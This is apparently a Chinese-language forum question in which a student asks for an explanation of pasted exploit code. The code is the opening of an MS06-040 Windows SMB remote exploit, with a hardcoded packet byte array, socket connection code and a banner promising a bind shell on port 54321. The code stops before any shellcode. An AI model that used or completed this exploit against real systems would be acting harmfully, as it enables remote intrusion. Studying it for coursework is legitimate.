-1
[Buffer - overflow exploit code][1]
嗨,我做了一個利用Windows 2000服務器作爲任務的一部分,需要一點幫助。我已經附上了一個在c文件中的漏洞利用代碼截圖,但我真的不明白這個代碼的作用,並且想知道是否有人會向我解釋這個硬代碼在漏洞利用中究竟做了什麼。到目前爲止,我知道這個代碼爲我提供了一個遠程綁定外殼在端口54321緩衝區溢出漏洞利用代碼
char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d,
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c,
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02,
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c,
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00,
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00,
0x00, 0x00 };
int main(int argc,char **argv)
{
int fd;
int con;
int repbf[20000];
struct sockaddr_in target;
if(argc < 2)
{
printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");
exit(1);
}
fd = socket(AF_INET,SOCK_STREAM,0);
if(fd < 0)
{
perror("Could not create socket\n");
exit(1);
}
printf("Target: %s\n",argv[1]);
target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);
con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));
if(con < 0)
{
printf("Could not connect\n");
exit(1);
}
這是攻擊代碼 感謝